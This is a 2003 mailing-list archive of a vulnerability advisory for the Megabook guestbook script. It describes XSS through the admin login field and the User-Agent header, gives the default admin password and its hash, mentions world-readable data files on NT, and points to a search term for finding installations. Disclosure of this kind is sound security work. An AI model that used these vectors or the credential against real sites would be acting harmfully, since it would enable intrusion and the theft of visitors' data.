Megabook 2.0 -XSS & UA execution

From: morning_wood (se_cur_ityat_private)
Date: Mon Jun 30 2003 - 09:56:03 PDT

Next message: Matt Zimmerman: "[SECURITY] [DSA-331-1] New imagemagick packages fix insecure temporary file creation"

Previous message: Fozzy: "Aprelium Abyss webserver X1 arbitrary code execution and header injection"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

------------------------------------------------------------------
          - EXPL-A-2003-011 exploitlabs.com Advisory 011
------------------------------------------------------------------
                        -= MegaBook =-



exploitlabs.com
June 29, 2003



Vunerability(s):
----------------
1. XSS and Unchecked Input Length
2. default admin password
3. XSS via UA
4. Non secure on NT
5. Undocumented attack vectors
Product:
--------
megabook guestbook
http://www.militerry.com/megabook/

Description of product:
-----------------------
"Megabook is an online guestbook that allows users that come to your
site to leave a message. These messages can also contain their e-mail
addresses, websites.""everyone will be able to view the messages left
by past users"  ...and whatever XSS they care to leave

from thier FAQ..

"Q: Will Megabook work on Windows NT servers?
A: Megabook was only tested on UNIX-based servers.
There is a possibility that it could work but from
other people testing it seems that it won't."

dunno who they use to test but it works fine on NT ( heck i'll beta )

Note: this is a very popular scrript, found easly by google: gbook.db
all tests were run in a default state per the instalation instructions
and
confirmed in the wild.


VUNERABILITY / EXPLOIT
======================

where to start...


1. XSS is executeable via the login field in admin.cgi and carries no
length limit
http://[test-ur]/megabook/admin.cgi

2. Default password is "megabook"
http://www.militerry.com/megabook/files/20/setup.db ( note:
meJyatGfwfBXQ  = megabook )
the first two characters are always the correct character and sequence

3. User Agent XSS vulnerability in gbook.db
contaminating the UA with XSS causes the script become readable /
executable on guestbook viewing

there are many more issues in this very popular script... I lost
track.

4. Despite the vendor saying the script does not work on NT, it does
with perl installed,
but this configuration is not desired as all files become www
readable.
( gbook.db contains email and ip addresses )
( setup.db contains the not great hashed password and admin info )

5. preview.txt , missing.txt and signgbook.cgi (sic)  provide posting
function ( not documented )
--------- snip of the cgi -------------
chmod(0666, "setup.db");
open (SETUP, "setup.db");
@setup = <SETUP>;
close(SETUP);
chmod(0000, "setup.db");
-------- end snip--------------------


Local:
------
not realy

Remote:
-------
real bad



Vendor Fix:
-----------
No fix on 0day

Vendor Contact:
---------------
megabookat_private
Concurrent with this advisory


Credits:
--------
Donnie Werner
http://exploitlabs.com
http://frame4.com

Next message: Matt Zimmerman: "[SECURITY] [DSA-331-1] New imagemagick packages fix insecure temporary file creation"
Previous message: Fozzy: "Aprelium Abyss webserver X1 arbitrary code execution and header injection"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jun 30 2003 - 11:55:17 PDT